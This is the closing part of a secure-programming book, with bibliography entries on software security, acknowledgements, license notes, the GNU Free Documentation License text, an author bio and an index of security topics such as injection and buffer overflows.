Motor Industry Software Reliability Association (MISRA) http://www.misra.org.uk
[Mudge 1995] Mudge. October 20, 1995. How to write Buffer Overflows. l0pht advisories.
http://www.l0pht.com/advisories/bufero.html.
[Murhammer 1998] Murhammer, Martin W., Orcun Atakan, Stefan Bretz, Larry R. Pugh, Kazunari
Suzuki, and David H. Wood. October 1998. TCP/IP Tutorial and Technical Overview IBM International
Technical Support Organization. http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf
[NCSA] NCSA Secure Programming Guidelines.
http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming.
[Neumann 2000] Neumann, Peter. 2000. "Robust Nonproprietary Software." Proceedings of the 2000
IEEE Symposium on Security and Privacy (the “Oakland Conference”), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society. pp.122-123.
[NSA 2000] National Security Agency (NSA). September 2000. Information Assurance Technical
Framework (IATF). http://www.iatf.net.
[Open Group 1997] The Open Group. 1997. Single UNIX Specification, Version 2 (UNIX 98).
http://www.opengroup.org/online-pubs?DOC=007908799.
[OSI 1999] Open Source Initiative. 1999. The Open Source Definition.
http://www.opensource.org/osd.html.
170
Chapter 13. Bibliography
[Opplinger 1998] Oppliger, Rolf. 1998. Internet and Intranet Security. Norwood, MA: Artech House.
ISBN 0-89006-829-1.
[Paulk 1993a] Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber. Capability
Maturity Model for Software, Version 1.1. Software Engineering Institute, CMU/SEI-93-TR-24. DTIC
Number ADA263403, February 1993. http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html.
[Paulk 1993b] Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth Chrissis, and Marilyn
W. Bush. Key Practices of the Capability Maturity Model, Version 1.1. Software Engineering Institute.
CMU/SEI-93-TR-25, DTIC Number ADA263432, February 1993.
[Peteanu 2000] Peteanu, Razvan. July 18, 2000. Best Practices for Secure Web Development.
http://members.home.net/razvan.peteanu
[Pfleeger 1997] Pfleeger, Charles P. 1997. Security in Computing. Upper Saddle River, NJ: Prentice-Hall
PTR. ISBN 0-13-337486-6.
[Phillips 1995] Phillips, Paul. September 3, 1995. Safe CGI Programming.
http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt
[Quintero 1999] Quintero, Federico Mena, Miguel de Icaza, and Morten Welinder GNOME
Programming Guidelines http://developer.gnome.org/doc/guides/programming-guidelines/book1.html
[Raymond 1997] Raymond, Eric. 1997. The Cathedral and the Bazaar.
http://www.catb.org/~esr/writings/cathedral-bazaar
[Raymond 1998] Raymond, Eric. April 1998. Homesteading the Noosphere.
http://www.catb.org/~esr/writings/homesteading
[Ranum 1998] Ranum, Marcus J. 1998. Security-critical coding for programmers - a C and
UNIX-centric full-day tutorial. http://www.clark.net/pub/mjr/pubs/pdf/.
[RFC 822] August 13, 1982 Standard for the Format of ARPA Internet Text Messages. IETF RFC 822.
http://www.ietf.org/rfc/rfc0822.txt.
[rfp 1999] rain.forest.puppy. 1999. “Perl CGI problems”. Phrack Magazine. Issue 55, Article 07.
http://www.phrack.com/search.phtml?view&article=p55-7 or http://www.insecure.org/news/P55-07.txt.
[Rijmen 2000] Rijmen, Vincent. "LinuxSecurity.com Speaks With AES Winner".
http://www.linuxsecurity.com/feature_stories/interview-aes-3.html.
[Rochkind 1985]. Rochkind, Marc J. Advanced Unix Programming. Englewood Cliffs, NJ:
Prentice-Hall, Inc. ISBN 0-13-011818-4.
[Sahu 2002] Sahu, Bijaya Nanda, Srinivasan S. Muthuswamy, Satya Nanaji Rao Mallampalli, and
Venkata R. Bonam. July 2002 “Is your Java code secure -- or exposed? Build safer applications now to
avoid trouble later” http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain
[St. Laurent 2000] St. Laurent, Simon. February 2000. XTech 2000 Conference Reports. “When XML
Gets Ugly”. http://www.xml.com/pub/2000/02/xtech/megginson.html.
[Saltzer 1974] Saltzer, J. July 1974. “Protection and the Control of Information Sharing in MULTICS”.
Communications of the ACM. v17 n7. pp. 388-402.
[Saltzer 1975] Saltzer, J., and M. Schroeder. September 1975. “The Protection of Information in
Computing Systems”. Proceedings of the IEEE. v63 n9. pp. 1278-1308.
http://www.mediacity.com/~norm/CapTheory/ProtInf. Summarized in [Pfleeger 1997, 286].
171
Chapter 13. Bibliography
[Schneider 2000] Schneider, Fred B. 2000. "Open Source in Security: Visting the Bizarre." Proceedings
of the 2000 IEEE Symposium on Security and Privacy (the “Oakland Conference”), May 14-17, 2000,
Berkeley, CA. Los Alamitos, CA: IEEE Computer Society. pp.126-127.
[Schneier 1996] Schneier, Bruce. 1996. Applied Cryptography, Second Edition: Protocols, Algorithms,
and Source Code in C. New York: John Wiley and Sons. ISBN 0-471-12845-7.
[Schneier 1998] Schneier, Bruce and Mudge. November 1998. Cryptanalysis of Microsoft’s
Point-to-Point Tunneling Protocol (PPTP) Proceedings of the 5th ACM Conference on Communications
and Computer Security, ACM Press. http://www.counterpane.com/pptp.html.
[Schneier 1999] Schneier, Bruce. September 15, 1999. “Open Source and Security”. Crypto-Gram.
Counterpane Internet Security, Inc. http://www.counterpane.com/crypto-gram-9909.html
[Seifried 1999] Seifried, Kurt. October 9, 1999. Linux Administrator’s Security Guide.
http://www.securityportal.com/lasg.
[Seifried 2001] Seifried, Kurt. September 2, 2001. WWW Authentication
http://www.seifried.org/security/www-auth/index.html.
[Shankland 2000] Shankland, Stephen. “Linux poses increasing threat to Windows 2000”. CNET.
http://news.cnet.com/news/0-1003-200-1549312.html
[Shostack 1999] Shostack, Adam. June 1, 1999. Security Code Review Guidelines.
http://www.homeport.org/~adam/review.html.
[Sibert 1996] Sibert, W. Olin. Malicious Data and Computer Security. (NIST) NISSC ’96.
http://www.fish.com/security/maldata.html
[Sitaker 1999] Sitaker, Kragen. Feb 26, 1999. How to Find Security Holes
http://www.pobox.com/~kragen/security-holes.html and
http://www.dnaco.net/~kragen/security-holes.html
[SSE-CMM 1999] SSE-CMM Project. April 1999. Systems Security Engineering Capability Maturity
Model (SSE CMM) Model Description Document. Version 2.0. http://www.sse-cmm.org
[Stallings 1996] Stallings, William. Practical Cryptography for Data Internetworks. Los Alamitos, CA:
IEEE Computer Society Press. ISBN 0-8186-7140-8.
[Stein 1999]. Stein, Lincoln D. September 13, 1999. The World Wide Web Security FAQ. Version 2.0.1
http://www.w3.org/Security/Faq/www-security-faq.html
[Swan 2001] Swan, Daniel. January 6, 2001. comp.os.linux.security FAQ. Version 1.0.
http://www.linuxsecurity.com/docs/colsfaq.html.
[Swanson 1996] Swanson, Marianne, and Barbara Guttman. September 1996. Generally Accepted
Principles and Practices for Securing Information Technology Systems. NIST Computer Security Special
Publication (SP) 800-14. http://csrc.nist.gov/publications/nistpubs/index.html.
[Thompson 1974] Thompson, K. and D.M. Richie. July 1974. “The UNIX Time-Sharing System”.
Communications of the ACM Vol. 17, No. 7. pp. 365-375.
[Torvalds 1999] Torvalds, Linus. February 1999. “The Story of the Linux Kernel”. Open Sources: Voices
from the Open Source Revolution. Edited by Chris Dibona, Mark Stone, and Sam Ockman. O’Reilly and
Associates. ISBN 1565925823. http://www.oreilly.com/catalog/opensources/book/linus.html
[TruSecure 2001] TruSecure. August 2001. Open Source Security: A Look at the Security Benefits of
Source Code Access. http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf
172
Chapter 13. Bibliography
173
Appendix A. History
Here are a few key events in the development of this book, starting from most recent events:
Note that a more detailed description of changes is available on-line in the “ChangeLog” file.
174
Appendix B. Acknowledgements
As iron sharpens iron, so one man
sharpens another.
Proverbs 27:17 (NIV)
My thanks to the following people who kept me honest by sending me emails noting errors, suggesting
areas to cover, asking questions, and so on. Where email addresses are included, they’ve been shrouded
by prepending my “thanks.” so bulk emailers won’t easily get these addresses; inclusion of people in this
list is not an authorization to send unsolicited bulk email to them.
• Neil Brown ([email protected])
• Martin Douda ([email protected])
• Jorge Godoy
• Scott Ingram ([email protected])
• Michael Kerrisk
• Doug Kilpatrick
• John Levon ([email protected])
• Ryan McCabe ([email protected])
• Paul Millar ([email protected])
• Chuck Phillips ([email protected])
• Martin Pool ([email protected])
• Eric S. Raymond ([email protected])
• Marc Welz
• Eric Werme ([email protected])
175
Appendix C. About the Documentation License
A copy of the text of the edict was to be
issued as law in every province and
made known to the people of every
nationality so they would be ready for
that day.
Esther 3:14 (NIV)
This document is Copyright (C) 1999-2000 David A. Wheeler. Permission is granted to copy, distribute
and/or modify this document under the terms of the GNU Free Documentation License (FDL), Version
1.1 or any later version published by the Free Software Foundation; with the invariant sections being
“About the Author”, with no Front-Cover Texts, and no Back-Cover texts. A copy of the license is
included below in Appendix D.
These terms do permit mirroring by other web sites, but be sure to do the following:
• make sure your mirrors automatically get upgrades from the master site,
• clearly show the location of the master site (http://www.dwheeler.com/secure-programs), with a
hypertext link to the master site, and
• give me (David A. Wheeler) credit as the author.
The first two points primarily protect me from repeatedly hearing about obsolete bugs. I do not want to
hear about bugs I fixed a year ago, just because you are not properly mirroring the document. By linking
to the master site, users can check and see if your mirror is up-to-date. I’m sensitive to the problems of
sites which have very strong security requirements and therefore cannot risk normal connections to the
Internet; if that describes your situation, at least try to meet the other points and try to occasionally
sneakernet updates into your environment.
By this license, you may modify the document, but you can’t claim that what you didn’t write is yours
(i.e., plagiarism) nor can you pretend that a modified version is identical to the original work. Modifying
the work does not transfer copyright of the entire work to you; this is not a “public domain” work in
terms of copyright law. See the license in Appendix D for details. If you have questions about what the
license allows, please contact me. In most cases, it’s better if you send your changes to the master
integrator (currently David A. Wheeler), so that your changes will be integrated with everyone else’s
changes into the master copy.
I am not a lawyer, nevertheless, it’s my position as an author and software developer that any code
fragments not explicitly marked otherwise are so small that their use fits under the “fair use” doctrine in
copyright law. In other words, unless marked otherwise, you can use the code fragments without any
restriction at all. Copyright law does not permit copyrighting absurdly small components of a work (e.g.,
“I own all rights to B-flat and B-flat minor chords”), and the fragments not marked otherwise are of the
same kind of minuscule size when compared to real programs. I’ve done my best to give credit for
specific pieces of code written by others. Some of you may still be concerned about the legal status of
this code, and I want make sure that it’s clear that you can use this code in your software. Therefore,
code fragments included directly in this document not otherwise marked have also been released by me
under the terms of the “MIT license”, to ensure you that there’s no serious legal encumbrance:
176
Appendix C. About the Documentation License
177
Appendix D. GNU Free Documentation License
Version 1.1, March 2000
Copyright © 2000
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is
not allowed.
0. PREAMBLE
The purpose of this License is to make a manual, textbook, or other written document "free" in the
sense of freedom: to assure everyone the effective freedom to copy and redistribute it, with or
without modifying it, either commercially or noncommercially. Secondarily, this License preserves
for the author and publisher a way to get credit for their work, while not being considered
responsible for modifications made by others.
This License is a kind of "copyleft", which means that derivative works of the document must
themselves be free in the same sense. It complements the GNU General Public License, which is a
copyleft license designed for free software.
We have designed this License in order to use it for manuals for free software, because free software
needs free documentation: a free program should come with manuals providing the same freedoms
that the software does. But this License is not limited to software manuals; it can be used for any
textual work, regardless of subject matter or whether it is published as a printed book. We
recommend this License principally for works whose purpose is instruction or reference.
178
Appendix D. GNU Free Documentation License
The "Invariant Sections" are certain Secondary Sections whose titles are designated, as being those
of Invariant Sections, in the notice that says that the Document is released under this License.
The "Cover Texts" are certain short passages of text that are listed, as Front-Cover Texts or
Back-Cover Texts, in the notice that says that the Document is released under this License.
A "Transparent" copy of the Document means a machine-readable copy, represented in a format
whose specification is available to the general public, whose contents can be viewed and edited
directly and straightforwardly with generic text editors or (for images composed of pixels) generic
paint programs or (for drawings) some widely available drawing editor, and that is suitable for input
to text formatters or for automatic translation to a variety of formats suitable for input to text
formatters. A copy made in an otherwise Transparent file format whose markup has been designed
to thwart or discourage subsequent modification by readers is not Transparent. A copy that is not
"Transparent" is called "Opaque".
Examples of suitable formats for Transparent copies include plain ASCII without markup, Texinfo
input format, LaTeX input format, SGML or XML using a publicly available DTD, and
standard-conforming simple HTML designed for human modification. Opaque formats include
PostScript, PDF, proprietary formats that can be read and edited only by proprietary word
processors, SGML or XML for which the DTD and/or processing tools are not generally available,
and the machine-generated HTML produced by some word processors for output purposes only.
The "Title Page" means, for a printed book, the title page itself, plus such following pages as are
needed to hold, legibly, the material this License requires to appear in the title page. For works in
formats which do not have any title page as such, "Title Page" means the text near the most
prominent appearance of the work’s title, preceding the beginning of the body of the text.
2. VERBATIM COPYING
You may copy and distribute the Document in any medium, either commercially or
noncommercially, provided that this License, the copyright notices, and the license notice saying
this License applies to the Document are reproduced in all copies, and that you add no other
conditions whatsoever to those of this License. You may not use technical measures to obstruct or
control the reading or further copying of the copies you make or distribute. However, you may
accept compensation in exchange for copies. If you distribute a large enough number of copies you
must also follow the conditions in section 3.
You may also lend copies, under the same conditions stated above, and you may publicly display
copies.
3. COPYING IN QUANTITY
If you publish printed copies of the Document numbering more than 100, and the Document’s
license notice requires Cover Texts, you must enclose the copies in covers that carry, clearly and
legibly, all these Cover Texts: Front-Cover Texts on the front cover, and Back-Cover Texts on the
back cover. Both covers must also clearly and legibly identify you as the publisher of these copies.
The front cover must present the full title with all words of the title equally prominent and visible.
You may add other material on the covers in addition. Copying with changes limited to the covers,
as long as they preserve the title of the Document and satisfy these conditions, can be treated as
verbatim copying in other respects.
If the required texts for either cover are too voluminous to fit legibly, you should put the first ones
listed (as many as fit reasonably) on the actual cover, and continue the rest onto adjacent pages.
179
Appendix D. GNU Free Documentation License
If you publish or distribute Opaque copies of the Document numbering more than 100, you must
either include a machine-readable Transparent copy along with each Opaque copy, or state in or
with each Opaque copy a publicly-accessible computer-network location containing a complete
Transparent copy of the Document, free of added material, which the general network-using public
has access to download anonymously at no charge using public-standard network protocols. If you
use the latter option, you must take reasonably prudent steps, when you begin distribution of
Opaque copies in quantity, to ensure that this Transparent copy will remain thus accessible at the
stated location until at least one year after the last time you distribute an Opaque copy (directly or
through your agents or retailers) of that edition to the public.
It is requested, but not required, that you contact the authors of the Document well before
redistributing any large number of copies, to give them a chance to provide you with an updated
version of the Document.
4. MODIFICATIONS
You may copy and distribute a Modified Version of the Document under the conditions of sections 2
and 3 above, provided that you release the Modified Version under precisely this License, with the
Modified Version filling the role of the Document, thus licensing distribution and modification of
the Modified Version to whoever possesses a copy of it. In addition, you must do these things in the
Modified Version:
A. Use in the Title Page (and on the covers, if any) a title distinct from that of the Document, and
from those of previous versions (which should, if there were any, be listed in the History
section of the Document). You may use the same title as a previous version if the original
publisher of that version gives permission.
B. List on the Title Page, as authors, one or more persons or entities responsible for authorship of
the modifications in the Modified Version, together with at least five of the principal authors of
the Document (all of its principal authors, if it has less than five).
C. State on the Title Page the name of the publisher of the Modified Version, as the publisher.
D. Preserve all the copyright notices of the Document.
E. Add an appropriate copyright notice for your modifications adjacent to the other copyright
notices.
F. Include, immediately after the copyright notices, a license notice giving the public permission
to use the Modified Version under the terms of this License, in the form shown in the
Addendum below.
G. Preserve in that license notice the full lists of Invariant Sections and required Cover Texts
given in the Document’s license notice.
H. Include an unaltered copy of this License.
I. Preserve the section entitled "History", and its title, and add to it an item stating at least the
title, year, new authors, and publisher of the Modified Version as given on the Title Page. If
there is no section entitled "History" in the Document, create one stating the title, year, authors,
and publisher of the Document as given on its Title Page, then add an item describing the
Modified Version as stated in the previous sentence.
J. Preserve the network location, if any, given in the Document for public access to a Transparent
copy of the Document, and likewise the network locations given in the Document for previous
180
Appendix D. GNU Free Documentation License
versions it was based on. These may be placed in the "History" section. You may omit a
network location for a work that was published at least four years before the Document itself,
or if the original publisher of the version it refers to gives permission.
K. In any section entitled "Acknowledgements" or "Dedications", preserve the section’s title, and
preserve in the section all the substance and tone of each of the contributor acknowledgements
and/or dedications given therein.
L. Preserve all the Invariant Sections of the Document, unaltered in their text and in their titles.
Section numbers or the equivalent are not considered part of the section titles.
M. Delete any section entitled "Endorsements". Such a section may not be included in the
Modified Version.
N. Do not retitle any existing section as "Endorsements" or to conflict in title with any Invariant
Section.
If the Modified Version includes new front-matter sections or appendices that qualify as Secondary
Sections and contain no material copied from the Document, you may at your option designate
some or all of these sections as invariant. To do this, add their titles to the list of Invariant Sections
in the Modified Version’s license notice. These titles must be distinct from any other section titles.
You may add a section entitled "Endorsements", provided it contains nothing but endorsements of
your Modified Version by various parties--for example, statements of peer review or that the text
has been approved by an organization as the authoritative definition of a standard.
You may add a passage of up to five words as a Front-Cover Text, and a passage of up to 25 words
as a Back-Cover Text, to the end of the list of Cover Texts in the Modified Version. Only one
passage of Front-Cover Text and one of Back-Cover Text may be added by (or through
arrangements made by) any one entity. If the Document already includes a cover text for the same
cover, previously added by you or by arrangement made by the same entity you are acting on behalf
of, you may not add another; but you may replace the old one, on explicit permission from the
previous publisher that added the old one.
The author(s) and publisher(s) of the Document do not by this License give permission to use their
names for publicity for or to assert or imply endorsement of any Modified Version .
5. COMBINING DOCUMENTS
You may combine the Document with other documents released under this License, under the terms
defined in section 4 above for modified versions, provided that you include in the combination all of
the Invariant Sections of all of the original documents, unmodified, and list them all as Invariant
Sections of your combined work in its license notice.
The combined work need only contain one copy of this License, and multiple identical Invariant
Sections may be replaced with a single copy. If there are multiple Invariant Sections with the same
name but different contents, make the title of each such section unique by adding at the end of it, in
parentheses, the name of the original author or publisher of that section if known, or else a unique
number. Make the same adjustment to the section titles in the list of Invariant Sections in the license
notice of the combined work.
In the combination, you must combine any sections entitled "History" in the various original
documents, forming one section entitled "History"; likewise combine any sections entitled
"Acknowledgements", and any sections entitled "Dedications". You must delete all sections entitled
"Endorsements."
181
Appendix D. GNU Free Documentation License
6. COLLECTIONS OF DOCUMENTS
You may make a collection consisting of the Document and other documents released under this
License, and replace the individual copies of this License in the various documents with a single
copy that is included in the collection, provided that you follow the rules of this License for
verbatim copying of each of the documents in all other respects.
You may extract a single document from such a collection, and distribute it individually under this
License, provided you insert a copy of this License into the extracted document, and follow this
License in all other respects regarding verbatim copying of that document.
8. TRANSLATION
Translation is considered a kind of modification, so you may distribute translations of the Document
under the terms of section 4. Replacing Invariant Sections with translations requires special
permission from their copyright holders, but you may include translations of some or all Invariant
Sections in addition to the original versions of these Invariant Sections. You may include a
translation of this License provided that you also include the original English version of this
License. In case of a disagreement between the translation and the original English version of this
License, the original English version will prevail.
9. TERMINATION
You may not copy, modify, sublicense, or distribute the Document except as expressly provided for
under this License. Any other attempt to copy, modify, sublicense or distribute the Document is
void, and will automatically terminate your rights under this License. However, parties who have
received copies, or rights, from you under this License will not have their licenses terminated so
long as such parties remain in full compliance.
182
Appendix D. GNU Free Documentation License
version number of this License, you may choose any version ever published (not as a draft) by the
Free Software Foundation.
Addendum
To use this License in a document you have written, include a copy of the License in the document
and put the following copyright and license notices just after the title page:
Copyright © YEAR YOUR NAME.
Permission is granted to copy, distribute and/or modify this document under the terms of the GNU
Free Documentation License, Version 1.1 or any later version published by the Free Software
Foundation; with the Invariant Sections being LIST THEIR TITLES, with the Front-Cover Texts
being LIST, and with the Back-Cover Texts being LIST. A copy of the license is included in the
section entitled “GNU Free Documentation License”.
If you have no Invariant Sections, write "with no Invariant Sections" instead of saying which ones
are invariant. If you have no Front-Cover Texts, write "no Front-Cover Texts" instead of
"Front-Cover Texts being LIST"; likewise for Back-Cover Texts.
If your document contains nontrivial examples of program code, we recommend releasing these
examples in parallel under your choice of free software license, such as the GNU General Public
License, to permit their use in free software.
183
Appendix E. Endorsements
This version of the document is endorsed by the original author, David A. Wheeler, as a document that
should improve the security of programs, when applied correctly. Note that no book, including this one,
can guarantee that a developer who follows its guidelines will produce perfectly secure software.
Modifications (including translations) must remove this appendix per the license agreement included
above.
184
Appendix F. About the Author
Dr. David A. Wheeler is an expert in computer security and has long specialized in development
techniques for large and high-risk software systems. He has been involved in software development since
the mid-1970s, and with computer security since the early 1980s. His areas of knowledge include
computer security (including developing secure software) and open source software.
Dr. Wheeler is co-author and lead editor of the IEEE book Software Inspection: An Industry Best
Practice and author of the book Ada95: The Lovelace Tutorial. He is also the author of many smaller
papers and articles, including the Linux Program Library HOWTO.
Dr. Wheeler hopes that, by making this document available, other developers will make their software
more secure. You can reach him by email at [email protected] (no spam please), and you can also
see his web site at http://www.dwheeler.com.
185
Index
blacklist, 43
buffer bounds, 72
buffer overflow, 72
complete mediation, 84
design, 84
dynamically linked libraries (DLLs), 33
easy to use, 85
economy of mechanism, 84
fail-safe defaults, 85
format strings, 123
injection
shell, 115
SQL, 115
input validation, 43
least common mechanism, 85
least privilege, 84, 86
logical quotation, 20
metacharacters, 115
minimize feedback, 122
non-bypassability, 84
open design, 84
psychological acceptability, 85
salted hashes, 145
Saltzer and Schroeder, 84
separation of privilege, 85
shell injection, 115
simplicity, 84
SQL injection, 115
time of check - time of use, 95
TOCTOU, 95
UTF-8, 57
UTF-8 security issues, 58
whitelist, 43
186